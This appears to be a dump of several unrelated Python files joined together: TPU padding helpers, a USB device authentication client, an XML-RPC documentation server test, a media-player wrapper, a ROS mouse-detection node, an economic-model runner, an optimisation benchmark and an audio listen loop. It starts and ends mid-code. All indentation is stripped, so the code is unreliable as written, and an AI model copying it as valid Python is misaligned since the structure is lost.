def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features)
if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
def __init__(self, signals):
self._signal_keys = []
for key in sorted(signals.iterkeys()):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
return [signals[key] for key in sorted(signals.iterkeys())]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use special API.
if key in params:
params.key = value
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
|
_device_authentication.py
|
import _hardware
import usb.core
import usb.util
import socket
import time
import sys
import threading
class DeviceAuthentication:
def __init__(self, vid, pid):
self.auth_url = "auth.projectsantacruz.azure.net"
self.vid = vid
self.pid = pid
self.write_endpoint = 0x01
self.read_endpoint = 0x81
self.is_authenticated = False
self._current_data = None
self._previous_data = None
self._current = b''
self._is_listening = True
self._active_thread = False
self._s = socket.socket()
def _call_service(self, arr):
msg_bytes = bytearray(arr)
self._s.send(msg_bytes)
def _send_to_usb(self, dev, data_bytes):
msg = [x for x in data_bytes]
# print(f"Msg length: {len(msg)}")
# print("Write:", msg, dev.write(self.write_endpoint, msg))
dev.write(self.write_endpoint, msg)
time.sleep(1)
read_msg = dev.read(self.read_endpoint, 5120)
# print("Read:", read_msg)
# print(len(read_msg))
return read_msg
def _listen_service(self, arr, max_length=4096):
# print("Start listening...")
while self._is_listening:
received = self._s.recv(max_length)
# print(f"Received from webservice: {received}")
self._current += received
if self._active_thread is False:
t = threading.Thread(target=self._set_received_data)
t.daemon = True
t.start()
self._active_thread = True
def _set_received_data(self):
# print("Thread started")
timestamp = time.time()
while True:
if time.time() > timestamp + 2:
# print("Data received fully")
self._previous_data = self._current_data
self._current_data = self._current
self._current = b''
self._active_thread = False
return
def start_authentication(self):
self._s.connect((self.auth_url, 443))
self._l_thread = threading.Thread(target=self._listen_service, args=(4096,))
self._l_thread.daemon = True
self._l_thread.start()
# This is for audio/ear SoM
dev = usb.core.find(idVendor=self.vid, idProduct=self.pid)
if dev is None:
raise ValueError('Device not found')
# print(dev)
if dev.is_kernel_driver_active(0):
try:
dev.detach_kernel_driver(0)
# print("Kernel driver detached")
except usb.core.USBError as e:
sys.exit("Could not detach kernel driver: ")
try:
dev.set_configuration()
except:
print("ERROR: USB SoM is busy")
exit(1)
msg = [0x77, 0x01]
# print("Write:", msg, dev.write(self.write_endpoint, msg))
dev.write(self.write_endpoint, msg)
read_msg = dev.read(self.read_endpoint, 5120)
# print("Read:", read_msg)
# print(len(read_msg))
while True:
if read_msg[1] == 4:
print("Authentication failed")
self._is_listening = False
self._s.shutdown(socket.SHUT_RDWR)
self._s.close()
# self._l_thread.join()
sys.exit()
elif read_msg[1] == 5:
# print("Authentication successful!")
self.is_authenticated = True
self._is_listening = False
self._s.shutdown(socket.SHUT_RDWR)
self._s.close()
# self._l_thread.join()
sys.exit()
elif read_msg[1] == 2:
# print(f"Call Webservice (2)")
self._call_service(read_msg[2:])
time.sleep(1)
read_msg = dev.read(self.read_endpoint, 5120)
continue
elif read_msg[1] == 3:
# print("Data from USB sensor:")
# print(read_msg)
time.sleep(3)
expected_length = int.from_bytes(read_msg[2:], byteorder='little', signed=False)
# print(f"Expected length: {expected_length}")
read_msg = self._send_to_usb(dev, self._current_data[:expected_length])
self._current_data = self._current_data[expected_length:]
time.sleep(1)
|
test_docxmlrpc.py
|
from DocXMLRPCServer import DocXMLRPCServer
import httplib
from test import test_support
import threading
import time
import unittest
import xmlrpclib
PORT = None
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"""This is an XML-RPC server's documentation, but the server can be used by
POSTing to /RPC2. Try self.add, too.""")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
n = 1000
while n > 0 and PORT is None:
time.sleep(0.001)
n -= 1
self.client = httplib.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server throws an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(
"""<dl><dt><a name="-<lambda>"><strong><lambda></strong></a>(x, y)</dt></dl>"""
in response.read())
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to PEPS
and RFCs with links, and that it linkifies text starting with http or
ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_( # This is ugly ... how can it be made better?
"""<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd><tt>Add two instances together. This follows <a href="http://www.python.org/dev/peps/pep-0008/">PEP008</a>, but has nothing<br>\nto do with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">RFC1952</a>. Case should matter: pEp008 and rFC1952. Things<br>\nthat start with http and ftp should be auto-linked, too:<br>\n<a href="http://google.com">http://google.com</a>.</tt></dd></dl>"""
in response.read())
def test_system_methods(self):
"""Test the precense of three consecutive system.* methods.
This also tests their use of parameter type recognition and the systems
related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(
"""<dl><dt><a name="-system.listMethods"><strong>system.listMethods</strong></a>()</dt><dd><tt><a href="#-system.listMethods">system.listMethods</a>() => [\'add\', \'subtract\', \'multiple\']<br>\n <br>\nReturns a list of the methods supported by the server.</tt></dd></dl>\n <dl><dt><a name="-system.methodHelp"><strong>system.methodHelp</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodHelp">system.methodHelp</a>(\'add\') => "Adds two integers together"<br>\n <br>\nReturns a string containing documentation for the specified method.</tt></dd></dl>\n <dl><dt><a name="-system.methodSignature"><strong>system.methodSignature</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">system.methodSignature</a>(\'add\') => [double, int, int]<br>\n <br>\nReturns a list describing the signature of the method. In the<br>\nabove example, the add method takes two integers as arguments<br>\nand returns a double result.<br>\n <br>\nThis server does NOT support system.methodSignature.</tt></dd></dl>"""
in response.read())
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_("""Try self.<strong>add</strong>, too.""" in
response.read())
def test_main():
test_support.run_unittest(DocXMLRPCHTTPGETServer)
if __name__ == '__main__':
test_main()
|
__init__.py
|
import re
from threading import Thread
from time import sleep
import pexpect
from pyomxplayer.parser import OMXPlayerParser
class OMXPlayer(object):
_STATUS_REGEX = re.compile(r'M:\s*([\d.]+).*')
_DONE_REGEX = re.compile(r'have a nice day.*')
_DURATION_REGEX = re.compile(r'Duration: (.+?):(.+?):(.+?),')
_LAUNCH_CMD = 'omxplayer -s %s %s'
_INFO_CMD = 'omxplayer -i %s'
_PAUSE_CMD = 'p'
_TOGGLE_SUB_CMD = 's'
_INC_SPEED_CMD = '1'
_DEC_SPEED_CMD = '2'
_PREV_AUDIO_CMD = 'j'
_NEXT_AUDIO_CMD = 'k'
_PREV_SUB_CMD = 'n'
_NEXT_SUB_CMD = 'm'
_QUIT_CMD = 'q'
_PREVIOUS_CMD = 'i'
_NEXT_CMD = 'o'
_DECREASE_VOLUME = '-'
_INCREASE_VOLUME = '+'
_BACK_30_CMD = '\x1b[D' #left
_BACK_600_CMD = '\x1b[B' #down
_FORWARD_30_CMD = '\x1b[C' #right
_FORWARD_600_CMD = '\x1b[A' #up
def __init__(self, media_file, args=None, start_playback=False,
_parser=OMXPlayerParser, _spawn=pexpect.spawn, stop_callback=None):
self.subtitles_visible = True
self._spawn = _spawn
self._launch_omxplayer(media_file, args)
self.parser = _parser(self._process)
self.duration = self._get_duration()
self._info_process.terminate()
self._monitor_play_position()
self._stop_callback = stop_callback
# By default the process starts playing
self.paused = False
if not start_playback:
self.toggle_pause()
self.toggle_subtitles()
def _launch_omxplayer(self, media_file, args):
if not args:
args = ''
cmd = self._LAUNCH_CMD % (media_file, args)
self._process = self._spawn(cmd)
info_cmd = self._INFO_CMD % (media_file)
self._info_process = self._spawn(info_cmd)
def _monitor_play_position(self):
self._position_thread = Thread(target=self._get_position)
self._position_thread.start()
def _get_duration(self):
output = self._info_process.read()
matches = self._DURATION_REGEX.search(output)
if matches:
duration_info = matches.groups()
hours = int(re.sub('\x1b.*?m', '', duration_info[0]))
minutes = int(re.sub('\x1b.*?m', '', duration_info[1]))
seconds = float(re.sub('\x1b.*?m', '', duration_info[2]))
return int(hours*60*60*1000000 + minutes*60*1000000 + seconds*1000000)
else:
return 0
def _get_position(self):
while True:
index = self._process.expect([self._STATUS_REGEX,
pexpect.TIMEOUT,
pexpect.EOF,
self._DONE_REGEX])
def timed_out():
return index == 1
def process_finished():
return index in (2, 3)
if timed_out():
continue
elif process_finished():
if index == 3 and hasattr(self._stop_callback, '__call__'):
self._stop_callback()
break
else:
# Process is still running (happy path)
self.position = float(self._process.match.group(1)) / 1000000
sleep(0.05)
def is_running(self):
return self._process.isalive()
def toggle_pause(self):
if self._process.send(self._PAUSE_CMD):
self.paused = not self.paused
def toggle_subtitles(self):
if self._process.send(self._TOGGLE_SUB_CMD):
self.subtitles_visible = not self.subtitles_visible
def stop(self):
self._process.send(self._QUIT_CMD)
self._process.terminate(force=True)
def inc_speed(self):
self._process.send(self._INC_SPEED_CMD)
def dec_speed(self):
self._process.send(self._DEC_SPEED_CMD)
def prev_audio(self):
self._process.send(self._PREV_AUDIO_CMD)
def next_audio(self):
self._process.send(self._NEXT_AUDIO_CMD)
def prev_sub(self):
self._process.send(self._PREV_SUB_CMD)
def next_sub(self):
self._process.send(self._NEXT_SUB_CMD)
def previous_chapter(self):
self._process.send(self._PREVIOUS_CMD)
def next_chapter(self):
self._process.send(self._NEXT_CMD)
def back_30(self):
self._process.send(self._BACK_30_CMD)
def back_600(self):
self._process.send(self._BACK_600_CMD)
def forward_30(self):
self._process.send(self._FORWARD_30_CMD)
def forward_600(self):
self._process.send(self._FORWARD_600_CMD)
|
mouse_detection_node.py
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# Modifications Copyright Martin Paradesi. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
mouse_detection_node.py
This module creates the mouse_detection_node which is responsible for collecting
sensor data (camera images) from sensor_fusion_pkg and running motion detection,
on specified object, providing action trigger for rc_navigation_pkg.
The node defines:
image_subscriber: A subscriber to the /sensor_fusion_pkg/sensor_msg published
by the sensor_fusion_pkg with sensor data.
mouse_publisher: A publisher to publish whether a mouse was detected or not.
"""
import time
import signal
import threading
import cv2
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import (QoSProfile,
QoSHistoryPolicy,
QoSReliabilityPolicy)
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (EvoSensorMsg,
MouseDetectionMsg)
from mouse_detection_pkg import (constants,
utils)
class MouseDetectionNode(Node):
"""Node responsible for collecting sensor data (camera images) from sensor_fusion_pkg
and running motion detection on mouse object, providing action_trigger for rc_navigation_pkg.
"""
def __init__(self, qos_profile):
"""Create a MouseDetectionNode.
"""
super().__init__('mouse_detection_node')
self.get_logger().info("mouse_detection_node started.")
# Initialize variables
self.previous_sensor_data = np.zeros(shape=(3,480,640))
self.current_sensor_data = np.zeros(shape=(3,480,640))
self.h = 480
self.w = 640
self.mouse_flag = False
# Double buffer to hold the input images for inference.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Get DEVICE parameter (CPU/MYRIAD) from launch file.
self.declare_parameter("DEVICE")
self.device = self.get_parameter("DEVICE").get_parameter_value().string_value
if not self.device:
self.device = constants.DEVICE
# Create subscription to sensor messages from camera.
self.image_subscriber = self.create_subscription(EvoSensorMsg,
constants.SENSOR_FUSION_TOPIC,
self.on_image_received_cb,
qos_profile)
# Creating publisher for confidence score of mouse detection.
self.mouse_publisher = self.create_publisher(MouseDetectionMsg,
constants.MOUSE_PUBLISHER_TOPIC,
qos_profile)
self.bridge = CvBridge()
# Launching a separate thread to run inference.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_inference)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(f"Waiting for input images on {constants.SENSOR_FUSION_TOPIC}")
def wait_for_thread(self):
"""Function which joins the created background thread.
"""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread.
"""
self.stop_thread = True
def on_image_received_cb(self, sensor_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
sensor_data (EvoSensorMsg): Message containing sensor images and lidar data.
"""
self.input_buffer.put(sensor_data)
def preprocess(self, sensor_data):
"""Method that preprocesses the input data to be provided for inference to network.
Args:
sensor_data (EvoSensorMsg): Contains sensor images and lidar data.
Returns:
image: Preprosessed image expected by the network.
"""
image = self.bridge.imgmsg_to_cv2(sensor_data.images[0])
ih, iw = image.shape[:-1]
# Resize to required input size
if (ih, iw) != (int(self.h), int(self.w)):
image = cv2.resize(image, (int(self.w), int(self.h)))
# Change data layout from HWC to CHW.
image = image.transpose((2, 0, 1))
return image
def run_inference(self):
"""Method for running inference on received input image.
"""
try:
while not self.stop_thread:
# Get an input image from double buffer.
sensor_data = self.input_buffer.get()
start_time = time.time()
# Pre-process input.
self.current_sensor_data = self.preprocess(sensor_data)
# Initialize previous image
if np.array_equal(self.previous_sensor_data, np.zeros(shape=(3,480,640))):
self.previous_sensor_data = self.current_sensor_data
# Detect changes in images
detection_delta = cv2.absdiff(self.previous_sensor_data, self.current_sensor_data)
ret, thresh = cv2.threshold(detection_delta, 64, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
self.get_logger().info(f"Number of contours: {str(len(contours))}")
if len(contours) > 0 and len(contours) < 6:
self.mouse_flag = True
# Publish to object_detection_delta topic.
self.get_logger().info(f"Mouse detected: {self.mouse_flag}")
mouse_message = MouseDetectionMsg()
mouse_message.is_mouse = self.mouse_flag
self.mouse_publisher.publish(mouse_message)
# Save the current image as previous image and reset mouse_flag
self.previous_sensor_data = self.current_sensor_data
self.mouse_flag = False
self.get_logger().info(f"Total execution time = {time.time() - start_time}")
except Exception as ex:
self.get_logger().error(f"Failed inference step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST)
try:
mouse_detection_node = MouseDetectionNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
mouse_detection_node.get_logger().info("Signal Handler initiated")
mouse_detection_node.thread_shutdown()
mouse_detection_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(mouse_detection_node, executor)
except Exception as ex:
mouse_detection_node.get_logger().error(f"Exception in Mouse Detection Node: {ex}")
mouse_detection_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
mouse_detection_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
run_ogusa.py
|
import os
import sys
import uuid
from multiprocessing import Process
import time
OGUSA_PATH = os.environ.get("OGUSA_PATH", "../../ospc-dynamic/dynamic/Python")
sys.path.append(OGUSA_PATH)
import ogusa
from ogusa.scripts import postprocess
from ogusa.scripts.execute import runner
def run_micro_macro(reform, user_params, guid):
start_time = time.time()
REFORM_DIR = "./OUTPUT_REFORM_" + guid
BASELINE_DIR = "./OUTPUT_BASELINE_" + guid
# Add start year from reform to user parameters
if isinstance(reform, tuple):
start_year = sorted(reform[0].keys())[0]
else:
start_year = sorted(reform.keys())[0]
user_params['start_year'] = start_year
with open("log_{}.log".format(guid), 'w') as f:
f.write("guid: {}\n".format(guid))
f.write("reform: {}\n".format(reform))
f.write("user_params: {}\n".format(user_params))
'''
------------------------------------------------------------------------
Run baseline
------------------------------------------------------------------------
'''
output_base = BASELINE_DIR
kwargs={'output_base':output_base, 'baseline_dir':BASELINE_DIR,
'test':False, 'time_path':True, 'baseline':True,
'analytical_mtrs':False, 'age_specific':False,
'user_params':user_params,'guid':guid,
'run_micro':True, 'small_open': False, 'budget_balance':False, 'baseline_spending':False}
#p2 = Process(target=runner, kwargs=kwargs)
#p2.start()
runner(**kwargs)
'''
------------------------------------------------------------------------
Run reform
------------------------------------------------------------------------
'''
output_base = REFORM_DIR
kwargs={'output_base':output_base, 'baseline_dir':BASELINE_DIR,
'test':False, 'time_path':True, 'baseline':False,
'analytical_mtrs':False, 'age_specific':False,
'user_params':user_params,'guid':guid,
'run_micro':True, 'small_open': False, 'budget_balance':False, 'baseline_spending':False}
#p1 = Process(target=runner, kwargs=kwargs)
#p1.start()
runner(**kwargs)
#p1.join()
#p2.join()
time.sleep(0.5)
ans = postprocess.create_diff(baseline_dir=BASELINE_DIR, policy_dir=REFORM_DIR)
print "total time was ", (time.time() - start_time)
return ans
if __name__ == "__main__":
reform = {
2017: {
'_II_rt1': [.09],
'_II_rt2': [.135],
'_II_rt3': [.225],
'_II_rt4': [.252],
'_II_rt5': [.297],
'_II_rt6': [.315],
'_II_rt7': [0.3564],
}, }
run_micro_macro(reform=reform, user_params={'frisch': 0.44}, guid='abc')
|
test_ISLO.py
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 16:11, 14/08/2021 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
import multiprocessing
from pathlib import Path
from config import Config
from model import benchmark
from pandas import DataFrame
from time import time
from utils.IOUtil import save_results_to_csv
TRIALS = 20
PROBLEM_SIZE = 30
LB = [-100] * PROBLEM_SIZE
UB = [100] * PROBLEM_SIZE
VERBOSE = False
EPOCH = 1000
POP_SIZE = 50
LIST_FUNCTIONS = ["f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12", "f13", "f14", "f15", "f16", "f17", "f18", "f19", "f20"]
LIST_MHAS = ["ImprovedSLO2"]
def run_algorithm(name):
path_error = f"{Config.BENCHMARK_ERROR}/{name}/"
Path(path_error).mkdir(parents=True, exist_ok=True)
## Run model
for id_paras, func_name in enumerate(LIST_FUNCTIONS):
error_full = {}
error_columns = []
for id_trial in range(TRIALS):
time_start = time()
md = getattr(benchmark, name)(getattr(benchmark, func_name), LB, UB, VERBOSE, EPOCH, POP_SIZE)
_, best_fit, list_loss = md.train()
temp = f"trial_{str(id_trial)}"
error_full[temp] = list_loss
error_columns.append(temp)
time_end = time() - time_start
item = {'function': func_name, 'time': time_end, 'trial': id_trial, 'fit': best_fit}
save_results_to_csv(item, f"{PROBLEM_SIZE}D_{name}_best_fit", Config.BENCHMARK_BEST_FIT)
df = DataFrame(error_full, columns=error_columns)
df.to_csv(f"{path_error}/{PROBLEM_SIZE}D_{name}_{func_name}_error.csv", header=True, index=False)
if __name__ == '__main__':
starttime = time()
processes = []
for algorithm in LIST_MHAS:
p = multiprocessing.Process(target=run_algorithm, args=(algorithm,))
processes.append(p)
p.start()
for process in processes:
process.join()
print('That took: {} seconds'.format(time() - starttime))
|
listen.py
|
import numpy as np
from config.config import *
from lib.machinelearning import feature_engineering, feature_engineering_raw, get_label_for_directory, get_highest_intensity_of_wav_file, get_recording_power
import pyaudio
import wave
import time
import scipy
import scipy.io.wavfile
import hashlib
import os
import operator
import audioop
import math
import time
import csv
from queue import *
import threading
import traceback
import sys
import lib.ipc_manager as ipc_manager
import joblib
from lib.audio_model import AudioModel
from lib.stream_controls import manage_loop_state
from lib.key_poller import KeyPoller
STATE_POLLING_THRESHOLD = 0.2
def classify_audioframes( audioQueue, audio_frames, classifier, high_speed ):
if( not audioQueue.empty() ):
audio_frames.append( audioQueue.get() )
# In case we are dealing with frames not being met and a buffer being built up,
# Start skipping every other audio frame to maintain being up to date,
# Trading being up to date over being 100% correct in sequence
if( audioQueue.qsize() > 1 ):
print( "SKIP FRAME", audioQueue.qsize() )
audioQueue.get()
if( len( audio_frames ) >= 2 ):
audio_frames = audio_frames[-2:]
highestintensity = np.amax( audioop.maxpp( audio_frames[1], 4 ) / 32767 )
wavData = b''.join(audio_frames)
# SKIP FEATURE ENGINEERING COMPLETELY WHEN DEALING WITH SILENCE
if( high_speed == True and highestintensity < SILENCE_INTENSITY_THRESHOLD ):
probabilityDict, predicted, frequency = create_empty_probability_dict( classifier, {}, 0, highestintensity, 0 )
else:
fftData = np.frombuffer( wavData, dtype=np.int16 )
power = get_recording_power( fftData, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) )
probabilityDict, predicted, frequency = predict_raw_data( wavData, classifier, highestintensity, power )
return probabilityDict, predicted, audio_frames, highestintensity, frequency, wavData
return False, False, audio_frames, False, False, False
def action_consumer( stream, classifier, dataDicts, persist_replay, replay_file, mode_switcher=False ):
actions = []
global listening_state
starttime = time.time()
try:
if( persist_replay ):
with open(replay_file, 'a', newline='') as csvfile:
headers = ['time', 'winner', 'intensity', 'frequency', 'power', 'actions', 'buffer']
headers.extend( classifier.classes_ )
if ('silence' not in classifier.classes_):
headers.extend(['silence'])
writer = csv.DictWriter(csvfile, fieldnames=headers, delimiter=',')
writer.writeheader()
while( listening_state['currently_recording'] == True ):
if( not listening_state['classifierQueue'].empty() ):
current_time = time.time()
seconds_playing = time.time() - starttime
listening_state['last_audio_update'] = current_time
probabilityDict = listening_state['classifierQueue'].get()
dataDicts.append( probabilityDict )
if( len(dataDicts) > PREDICTION_LENGTH ):
dataDicts.pop(0)
if( mode_switcher ):
actions = mode_switcher.getMode().handle_input( dataDicts )
if( isinstance( actions, list ) == False ):
actions = []
replay_row = { 'time': int(seconds_playing * 1000) / 1000, 'actions': ':'.join(actions), 'buffer': listening_state['classifierQueue'].qsize()}
for label, labelDict in probabilityDict.items():
replay_row[ label ] = labelDict['percent']
if( labelDict['winner'] ):
replay_row['winner'] = label
replay_row['intensity'] = int(labelDict['intensity'])
replay_row['power'] = int(labelDict['power'])
replay_row['frequency'] = labelDict['frequency']
writer.writerow( replay_row )
csvfile.flush()
else:
time.sleep( RECORD_SECONDS / 3 )
else:
while( listening_state['currently_recording'] == True ):
if( not listening_state['classifierQueue'].empty() ):
dataDicts.append( classifierQueue.get() )
if( len(dataDicts) > PREDICTION_LENGTH ):
dataDicts.pop(0)
if( mode_switcher ):
actions = mode_switcher.getMode().handle_input( dataDicts )
if( isinstance( actions, list ) == False ):
actions = []
else:
time.sleep( RECORD_SECONDS / 3 )
except Exception as e:
print( "----------- ERROR DURING CONSUMING ACTIONS -------------- " )
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_tb)
listening_state['stream'].stop_stream()
listening_state['currently_recording'] = False
def classification_consumer( audio, stream, classifier, persist_files, high_speed ):
audio_frames = []
dataDicts = []
for i in range( 0, PREDICTION_LENGTH ):
dataDict = {}
for directoryname in classifier.classes_:
dataDict[ directoryname ] = {'percent': 0, 'intensity': 0, 'frequency': 0, 'winner': False}
dataDicts.append( dataDict )
starttime = time.time()
global listening_state
try:
while( listening_state['currently_recording'] == True ):
probabilityDict, predicted, audio_frames, highestintensity, frequency, wavData = classify_audioframes( listening_state['audioQueue'], audio_frames, classifier, high_speed )
# Skip if a prediction could not be made
if( probabilityDict == False ):
time.sleep( classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) / 3 )
continue
seconds_playing = time.time() - starttime
winner = classifier.classes_[ predicted ]
prediction_time = time.time() - starttime - seconds_playing
#long_comment = "Time: %0.2f - Prediction in: %0.2f - Winner: %s - Percentage: %0d - Frequency %0d " % (seconds_playing, prediction_time, winner, probabilityDict[winner]['percent'], probabilityDict[winner]['frequency'])
short_comment = "T %0.3f - [%0d%s %s] F:%0d P:%0d" % (seconds_playing, probabilityDict[winner]['percent'], '%', winner, frequency, probabilityDict[winner]['power'])
if( winner != "silence" ):
print( short_comment )
listening_state['classifierQueue'].put( probabilityDict )
if( persist_files ):
audioFile = wave.open(REPLAYS_AUDIO_FOLDER + "/%0.3f.wav" % (seconds_playing), 'wb')
audioFile.setnchannels(classifier.get_setting('CHANNELS', CHANNELS))
audioFile.setsampwidth(audio.get_sample_size(FORMAT))
audioFile.setframerate(classifier.get_setting('RATE', RATE))
audioFile.writeframes(wavData)
audioFile.close()
except Exception as e:
print( "----------- ERROR DURING AUDIO CLASSIFICATION -------------- " )
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_tb)
listening_state['stream'].stop_stream()
listening_state['currently_recording'] = False
def nonblocking_record( in_data, frame_count, time_info, status ):
global listening_state
listening_state['audioQueue'].put( in_data )
return in_data, pyaudio.paContinue
def start_nonblocking_listen_loop( classifier, mode_switcher = False, persist_replay = False, persist_files = False, amount_of_seconds=-1, high_speed=False ):
global listening_state
listening_state = {
'currently_recording': True,
'stream': None,
'audioQueue': Queue(maxsize=0),
'classifierQueue': Queue(maxsize=0),
'classifier_name': ipc_manager.getClassifier(),
'restart_listen_loop': False,
'last_audio_update': time.time()
}
# Get a minimum of these elements of data dictionaries
dataDicts = []
audio_frames = []
for i in range( 0, PREDICTION_LENGTH ):
dataDict = {}
for directoryname in classifier.classes_:
dataDict[ directoryname ] = {'percent': 0, 'intensity': 0, 'frequency': 0, 'winner': False}
dataDicts.append( dataDict )
starttime = time.time()
replay_file = REPLAYS_FOLDER + "/replay_" + str(int(starttime)) + ".csv"
